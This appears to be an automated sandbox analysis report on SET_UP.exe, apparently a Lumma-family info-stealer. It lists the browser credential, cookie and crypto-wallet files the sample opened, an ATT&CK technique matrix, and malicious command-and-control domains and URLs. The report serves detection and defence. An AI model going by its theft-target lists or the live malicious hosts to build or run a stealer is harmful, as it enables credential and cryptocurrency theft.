              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: Yara matchFile source: Process Memory Space: SET_UP.exe PID: 1104, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: SET_UP.exe PID: 1104, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              21
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              211
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              21
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
              Deobfuscate/Decode Files or Information
              LSASS Memory21
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol41
              Data from Local System
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell
              Logon Script (Windows)Logon Script (Windows)3
              Obfuscated Files or Information
              Security Account Manager2
              Process Discovery
              SMB/Windows Admin Shares2
              Clipboard Data
              3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              NTDS11
              File and Directory Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets32
              System Information Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              SET_UP.exe17%VirustotalBrowse
              SET_UP.exe16%ReversingLabsWin32.Exploit.LummaC
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://throwupset.click/apiIg0%Avira URL Cloudsafe
              https://throwupset.click/apibu9L0%Avira URL Cloudsafe
              throwupset.click0%Avira URL Cloudsafe
              https://throwupset.click/apizuJv_0%Avira URL Cloudsafe
              https://throwupset.click/Ze0%Avira URL Cloudsafe
              https://throwupset.click/h0%Avira URL Cloudsafe
              https://throwupset.click/n0%Avira URL Cloudsafe
              https://throwupset.click/eInt0%Avira URL Cloudsafe
              https://cegu.shop/aD100%Avira URL Cloudmalware
              https://throwupset.click/api.00%Avira URL Cloudsafe
              https://throwupset.click/api0%Avira URL Cloudsafe
              https://throwupset.click/w0%Avira URL Cloudsafe
              https://cegu.shop/8574262446/ph.txtZ100%Avira URL Cloudmalware
              https://throwupset.click/Pt0%Avira URL Cloudsafe
              https://klipvumisui.shop/int_clp_sha.txtack100%Avira URL Cloudmalware
              https://throwupset.click/apim0%Avira URL Cloudsafe
              https://throwupset.click:443/api0%Avira URL Cloudsafe
              https://cegu.shop/9OF100%Avira URL Cloudmalware
              https://cegu.shop/8574262446/ph.txtFWVO100%Avira URL Cloudmalware
              https://throwupset.click/ne0%Avira URL Cloudsafe
              https://throwupset.click/0%Avira URL Cloudsafe
              https://throwupset.click/80%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              cegu.shop
              185.161.251.21
              truefalse
                high
                throwupset.click
                104.21.112.1
                truetrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  throwupset.clicktrue
                  • Avira URL Cloud: safe
                  unknown
                  https://throwupset.click/apitrue
                  • Avira URL Cloud: safe
                  unknown
                  rabidcowse.shopfalse
                    high
                    wholersorie.shopfalse
                      high
                      cloudewahsj.shopfalse
                        high
                        noisycuttej.shopfalse
                          high
                          nearycrepso.shopfalse
                            high
                            https://cegu.shop/8574262446/ph.txtfalse
                              high
                              framekgirus.shopfalse
                                high
                                tirepublicerj.shopfalse
                                  high
                                  abruptyopsn.shopfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabSET_UP.exe, 00000000.00000003.1810201151.000000000369B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810287054.0000000003699000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=SET_UP.exe, 00000000.00000003.1810201151.000000000369B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810287054.0000000003699000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://throwupset.click/apibu9LSET_UP.exe, 00000000.00000002.4127024300.0000000000707000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2089447837.0000000000700000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://cegu.shop/SET_UP.exe, SET_UP.exe, 00000000.00000003.2089321840.000000000074C000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127400368.000000000074C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://dfgh.online/invoker.php?compName=SET_UP.exe, SET_UP.exe, 00000000.00000003.2089711383.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2089321840.000000000074C000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2494026017.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000757000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2089321840.0000000000755000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2089259947.000000000366C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000750000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SET_UP.exe, 00000000.00000003.1810201151.000000000369B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810287054.0000000003699000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://throwupset.click/apizuJv_SET_UP.exe, 00000000.00000003.2089321840.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000761000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://throwupset.click/ZeSET_UP.exe, 00000000.00000003.1823378295.0000000003656000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17SET_UP.exe, 00000000.00000003.1810789852.00000000036A7000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810684533.00000000036F3000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1823340570.00000000036A7000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810896812.00000000036A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://cegu.shop/aDSET_UP.exe, 00000000.00000003.2089321840.000000000074C000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127400368.000000000074C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://throwupset.click/eIntSET_UP.exe, 00000000.00000003.2089321840.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000761000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://throwupset.click/nSET_UP.exe, 00000000.00000003.2089321840.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1852131706.000000000075F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://x1.c.lencr.org/0SET_UP.exe, 00000000.00000003.1837056968.000000000368E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://x1.i.lencr.org/0SET_UP.exe, 00000000.00000003.1837056968.000000000368E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSET_UP.exe, 00000000.00000003.1810789852.0000000003682000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://throwupset.click/apiIgSET_UP.exe, 00000000.00000003.2089321840.000000000074C000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000750000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSET_UP.exe, 00000000.00000003.1810201151.000000000369B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810287054.0000000003699000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://throwupset.click/hSET_UP.exe, 00000000.00000003.2089321840.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000761000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://throwupset.click/api.0SET_UP.exe, 00000000.00000003.1809485265.00000000006C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://support.mozilla.org/products/firefoxgro.allSET_UP.exe, 00000000.00000003.1838150050.0000000003774000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://klipvumisui.shop/int_clp_sha.txtSET_UP.exe, SET_UP.exe, 00000000.00000003.2089321840.000000000074C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://throwupset.click/wSET_UP.exe, 00000000.00000003.2089321840.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000761000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.innosetup.com/SET_UP.exefalse
                                                              high
                                                              https://throwupset.click:443/apiSET_UP.exe, 00000000.00000003.1849569046.000000000365E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoSET_UP.exe, 00000000.00000003.1810201151.000000000369B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810287054.0000000003699000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://cegu.shop/8574262446/ph.txtZSET_UP.exe, 00000000.00000003.2089321840.000000000074C000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127400368.000000000074C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SET_UP.exe, 00000000.00000003.1810201151.000000000369B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810287054.0000000003699000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0SET_UP.exe, 00000000.00000003.1837056968.000000000368E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://ocsp.rootca1.amazontrust.com0:SET_UP.exe, 00000000.00000003.1837056968.000000000368E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016SET_UP.exe, 00000000.00000003.1810789852.00000000036A7000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810684533.00000000036F3000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1823340570.00000000036A7000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810896812.00000000036A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.ecosia.org/newtab/SET_UP.exe, 00000000.00000003.1810201151.000000000369B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810287054.0000000003699000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSET_UP.exe, 00000000.00000003.1838150050.0000000003774000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ac.ecosia.org/autocomplete?q=SET_UP.exe, 00000000.00000003.1810201151.000000000369B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810287054.0000000003699000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
